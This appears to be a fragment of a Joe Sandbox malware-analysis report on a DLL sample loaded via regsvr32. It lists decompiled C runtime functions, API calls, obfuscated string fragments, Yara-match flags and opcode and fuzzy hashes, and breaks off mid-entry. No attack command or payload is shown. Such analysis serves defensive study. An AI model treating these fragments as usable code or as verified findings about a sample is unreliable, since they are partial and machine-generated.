                                    • Instruction ID: e4bd894b2b1f7b9ef1ad6a2df7423bb6029b32d077619e3c403e9c7133be1b2d
                                    • Opcode Fuzzy Hash: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
                                    • Instruction Fuzzy Hash: EDE14F36A1CB5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D23280 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
				void* _t7;
				void* _t10;
				signed long long _t15;
				signed long long* _t16;
				signed long long _t20;
				signed long long _t24;

				_t7 = __rcx -  *0xf9d4b018; // 0x6ec74913a662
				if (_t7 != 0) goto 0xf9d2329a;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
				asm("repe ret");
				asm("dec eax");
				goto 0xf9d23720;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("o16 nop [eax+eax]");
				if (__r8 - 8 < 0) goto 0xf9d2330c;
				_t20 = __rdx * 0x1010101;
				_t10 = __r8 - 0x40;
				if (_t10 < 0) goto 0xf9d232ee;
				_t15 =  ~__rcx;
				if (_t10 == 0) goto 0xf9d232de;
				 *__rcx = _t20;
				_t16 = _t15 + __rcx;
				if (_t10 != 0) goto 0xf9d23327;
				_t24 = __r8 - _t15 & 7;
				if (_t10 == 0) goto 0xf9d2330c;
				 *_t16 = _t20;
				if (_t10 != 0) goto 0xf9d23300;
				if (_t24 == 0) goto 0xf9d2331b;
				_t16[1] = __edx & 0x000000ff;
				if (_t24 - 1 != 0) goto 0xf9d23311;
				return __eax;
			}









                                    0x7fef9d23280
                                    0x7fef9d23287
                                    0x7fef9d23289
                                    0x7fef9d23292
                                    0x7fef9d23294
                                    0x7fef9d23296
                                    0x7fef9d2329a
                                    0x7fef9d2329f
                                    0x7fef9d232a0
                                    0x7fef9d232a1
                                    0x7fef9d232a2
                                    0x7fef9d232a3
                                    0x7fef9d232a4
                                    0x7fef9d232a5
                                    0x7fef9d232a6
                                    0x7fef9d232b7
                                    0x7fef9d232c6
                                    0x7fef9d232ca
                                    0x7fef9d232ce
                                    0x7fef9d232d0
                                    0x7fef9d232d6
                                    0x7fef9d232db
                                    0x7fef9d232de
                                    0x7fef9d232ec
                                    0x7fef9d232f1
                                    0x7fef9d232f9
                                    0x7fef9d23300
                                    0x7fef9d2330a
                                    0x7fef9d2330f
                                    0x7fef9d23311
                                    0x7fef9d23319
                                    0x7fef9d2331b

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                    • String ID:
                                    • API String ID: 3778485334-0
                                    • Opcode ID: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                    • Instruction ID: 1cff5b4ce0ef1e4e3ef6199276dfa804718153c0ec8d85c09348b02a89a91835
                                    • Opcode Fuzzy Hash: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                    • Instruction Fuzzy Hash: 0F31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180019AF0 Relevance: 10.7, Strings: 8, Instructions: 710COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !f3$/w 8$CZ&B$KE$XW]${H$~V$ehl
                                    • API String ID: 0-603092622
                                    • Opcode ID: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                    • Instruction ID: cfa183faa2580dac9c87674e45a13d453ed6874265d0529349a04ca9f57a85af
                                    • Opcode Fuzzy Hash: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                    • Instruction Fuzzy Hash: 079206752047888BDBB8CF24D8897CE7BE1FB86354F10451DE94E8AA60DBB89744CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2443C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2480363372-3680694803
                                    • Opcode ID: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                    • Instruction ID: 043f5a1d32994ed4de3068b5f716ee40183123659e8364044ce03f87ba7bfcf6
                                    • Opcode Fuzzy Hash: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                    • Instruction Fuzzy Hash: 6D510A31A096828AE7F48B68EC4576E73E4F395354F614135DADD83BB4DB3EE4448B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001DBFC Relevance: 10.0, Strings: 7, Instructions: 1221COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$$3$1P$H<,D$I$e$e
                                    • API String ID: 0-63615268
                                    • Opcode ID: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                    • Instruction ID: 84603d17c853973844c2c43058df0d3f37fc759f8199a5ada31f3ca4409f6e56
                                    • Opcode Fuzzy Hash: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                    • Instruction Fuzzy Hash: 64E2CF715046898BDBF9DF24C88A7DD3BA1BB44344FA0C119E88ECE291DF745A8DEB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800091A8 Relevance: 9.4, Strings: 7, Instructions: 640COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $*TG$Ag9$N?$`S$jk7$yHb
                                    • API String ID: 0-938425255
                                    • Opcode ID: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                    • Instruction ID: 9f34faa7130dc1dd87f506cddbfe67dee9fd1f9295814769d0e47bce79b2000f
                                    • Opcode Fuzzy Hash: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                    • Instruction Fuzzy Hash: 6D62E371A0530CDFCB59DFA8D18A6DDBBF1FF48344F004119E84AA72A0D7B4991ACB89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001F908 Relevance: 9.2, Strings: 7, Instructions: 464COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$3A<7$B.$Jq^$eIas$p<c$~;-
                                    • API String ID: 0-2724674699
                                    • Opcode ID: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                    • Instruction ID: 11eaaa9cd8c54950f626fcd1c6608fbf38bfda5f45ba0fc90d4db62925cbbc4d
                                    • Opcode Fuzzy Hash: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                    • Instruction Fuzzy Hash: 4142EAB090438C8BCBB8DF64C8857DD7BF0FB48308F50852DEA1A9B251DBB05685CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2BE50 Relevance: 9.1, APIs: 6, Instructions: 79COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 33%
                                    			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				intOrPtr _v4;
				void* _v12;
				signed long long _v24;
				signed int _v36;
				long long _v180;
				long long _v184;
				intOrPtr _v192;
				char _v196;
				intOrPtr _v204;
				long _v212;
				long long _v220;
				long long _v228;
				long long _v1212;
				long long _v1308;
				char _v1460;
				char _v1476;
				char _v1484;
				int _v1492;
				long long _v1500;
				long long _v1508;
				long long _v1516;
				long long _v1524;
				long long _v1532;
				long long _v1540;
				void* _t51;
				signed long long _t80;
				long long _t85;
				void* _t100;

				_a24 = r8d;
				_a16 = __edx;
				_a8 = __ecx;
				_t80 =  *0xf9d4b018; // 0x6ec74913a662
				_v24 = _t80 ^ _t100 - 0x00000610;
				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
				E000007FE7FEF9D28D90(_t51, _a8);
				_v184 = 0;
				memset(__edi, 0, 0x94 << 0);
				_v1508 =  &_v196;
				_v1500 =  &_v1460;
				_v1492 = 0;
				_v212 = 0;
				__imp__RtlCaptureContext();
				_t85 = _v1212;
				_v220 = _t85;
				r8d = 0;
				0xf9d40e28();
				_v228 = _t85;
				if (_v228 == 0) goto 0xf9d2bf64;
				_v1516 = 0;
				_v1524 =  &_v1476;
				_v1532 =  &_v1484;
				_v1540 =  &_v1460;
				0xf9d40e22();
				goto 0xf9d2bf84;
				_v1212 = _v12;
				_v1308 =  &_v12;
				_v196 = _a4;
				_v192 = _a12;
				_v180 = _v12;
				_v1492 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				_v212 = UnhandledExceptionFilter(??);
				if (_v212 != 0) goto 0xf9d2bffb;
				if (_v1492 != 0) goto 0xf9d2bffb;
				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
			}































                                    0x7fef9d2be50
                                    0x7fef9d2be55
                                    0x7fef9d2be59
                                    0x7fef9d2be65
                                    0x7fef9d2be6f
                                    0x7fef9d2be7f
                                    0x7fef9d2be88
                                    0x7fef9d2be8d
                                    0x7fef9d2beaa
                                    0x7fef9d2beb4
                                    0x7fef9d2bebe
                                    0x7fef9d2bec3
                                    0x7fef9d2becb
                                    0x7fef9d2bedb
                                    0x7fef9d2bee1
                                    0x7fef9d2bee9
                                    0x7fef9d2bef1
                                    0x7fef9d2bf04
                                    0x7fef9d2bf09
                                    0x7fef9d2bf1a
                                    0x7fef9d2bf1c
                                    0x7fef9d2bf2a
                                    0x7fef9d2bf34
                                    0x7fef9d2bf3e
                                    0x7fef9d2bf5d
                                    0x7fef9d2bf62
                                    0x7fef9d2bf6c
                                    0x7fef9d2bf7c
                                    0x7fef9d2bf8b
                                    0x7fef9d2bf99
                                    0x7fef9d2bfa8
                                    0x7fef9d2bfb6
                                    0x7fef9d2bfbc
                                    0x7fef9d2bfcd
                                    0x7fef9d2bfdc
                                    0x7fef9d2bfe3
                                    0x7fef9d2bfed
                                    0x7fef9d2c013

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                    • String ID:
                                    • API String ID: 1239891234-0
                                    • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                    • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                    • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                    • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D28900 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                    • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                    • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                    • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002B368 Relevance: 7.1, Strings: 5, Instructions: 879COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fg$UE;~$ibq$X$o
                                    • API String ID: 0-4038568857
                                    • Opcode ID: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                    • Instruction ID: c65d31d342ee38981127283826f07a965cef744f0e08d64225b30ad95669dc15
                                    • Opcode Fuzzy Hash: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                    • Instruction Fuzzy Hash: B0A2E9B1E0470C9FCB59CFA8E48A6DEBBF2FB48344F004119E906B7251D7B49919CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000445C Relevance: 7.1, Strings: 5, Instructions: 813COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !g$!g$-{e$.9Y$7cm
                                    • API String ID: 0-3613756181
                                    • Opcode ID: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                    • Instruction ID: bf5508b14f48093895fd1996fdb0e85e6185e8dd26636c64e6a2ba956b5e503a
                                    • Opcode Fuzzy Hash: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                    • Instruction Fuzzy Hash: 409231711483CB8BCB78CF54C845BEEBBE1FB84704F10852CE86A8BA51E7B49649DB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800054D8 Relevance: 6.8, Strings: 5, Instructions: 573COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Ol$`P$i($km}&$ttR
                                    • API String ID: 0-1254889785
                                    • Opcode ID: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                    • Instruction ID: 987162bd0b035dc474e6baf50d73a519649db35efcc54d1c771acda0ad58d409
                                    • Opcode Fuzzy Hash: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                    • Instruction Fuzzy Hash: 57422870908B488FD769CF79C48965EBBF1FB88748F204A1DE6A297271DB709845CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001D128 Relevance: 6.5, Strings: 5, Instructions: 249COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &JS$T'$T'$t7"$wHM
                                    • API String ID: 0-3882947952
                                    • Opcode ID: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                    • Instruction ID: 5dfe4264b2e9e46270ab4916ee937e41ce96fb3ef9e59635e1bc08d1b7ce1cf5
                                    • Opcode Fuzzy Hash: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                    • Instruction Fuzzy Hash: C6C1E3B150464DDFCB98CF28D1856DA7BE0FF48318F41822AFC0A9B264D774DA68DB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180023748 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2T$=+%2$]|m$.s$9=
                                    • API String ID: 0-2491194820
                                    • Opcode ID: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                    • Instruction ID: b22ad84dfc9a36729601f04a7d34ea20b01e779292d252d1f9b28ced5abbce67
                                    • Opcode Fuzzy Hash: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                    • Instruction Fuzzy Hash: AE911570D0978C8FDB99DFE8D046BDEBBB2EB15348F40412DE44AAB298D774550ACB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180002888 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <jG$PXf$]V.$fE$2>
                                    • API String ID: 0-2974598014
                                    • Opcode ID: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                    • Instruction ID: 93145a700ffc0e4eb939e50d890ad0ed9c26548b847d798d32bc26a6146f6c62
                                    • Opcode Fuzzy Hash: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                    • Instruction Fuzzy Hash: 3FA1E9716097C88FDBBADF68C84A7CB7BE4FB49704F50461DD88A8A250CBB45649CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180026A64 Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -$<yH$`Zx$i,$i,
                                    • API String ID: 0-409805761
                                    • Opcode ID: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                    • Instruction ID: e265554e7eca7cf7370185f19b3f513919126148552d798dab9d7d185450bf95
                                    • Opcode Fuzzy Hash: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                    • Instruction Fuzzy Hash: 1F511D70E0470ECFCB59CFA8D4956EFBBB6EB44384F00816DD406A6290DB749B59CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000D12C Relevance: 5.6, Strings: 4, Instructions: 633COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G$B$f F$p1
                                    • API String ID: 0-995880848
                                    • Opcode ID: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                    • Instruction ID: e5e766d75efbf2695ddd79b534cb997516972fc828d7cc42ecf8557e6a546d15
                                    • Opcode Fuzzy Hash: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                    • Instruction Fuzzy Hash: F972F87058478A8FDBB8DF24C8857EF7BA2FB84304F11852DE89A8B250DBB59655CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180028D94 Relevance: 5.5, Strings: 4, Instructions: 533COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <!b$[2\$q+|k$qz;
                                    • API String ID: 0-4125875841
                                    • Opcode ID: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                    • Instruction ID: a542c4577bd7c2caf4f59e22e2006f44d15bdd166a7528eec1f5ff4567d3e676
                                    • Opcode Fuzzy Hash: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                    • Instruction Fuzzy Hash: 883234716187448FC769DF68C58A65EBBF0FB86744F10891DF6868B2A0C7B2D809CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000BEF0 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &$5RX$WE0$\h]
                                    • API String ID: 0-3485045178
                                    • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                    • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                    • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180013674 Relevance: 5.3, Strings: 4, Instructions: 329COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: A1$A1$\)$v8
                                    • API String ID: 0-2822171287
                                    • Opcode ID: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                    • Instruction ID: 6e847e787c057b57acc1c354f394c9b4082fee365cea8ba22b71c11ea9ebc013
                                    • Opcode Fuzzy Hash: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                    • Instruction Fuzzy Hash: 40F1EF71904348DBCF9CDF68C88A6DE7FA1FF48394FA05129FA4697250C7759989CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800126A8 Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *ECV$;.$;.$pv>&
                                    • API String ID: 0-2557916696
                                    • Opcode ID: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                    • Instruction ID: 7999f9c4935295cc2aa309186ca72e602cbe03928e3ff34651e0e21172d74868
                                    • Opcode Fuzzy Hash: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
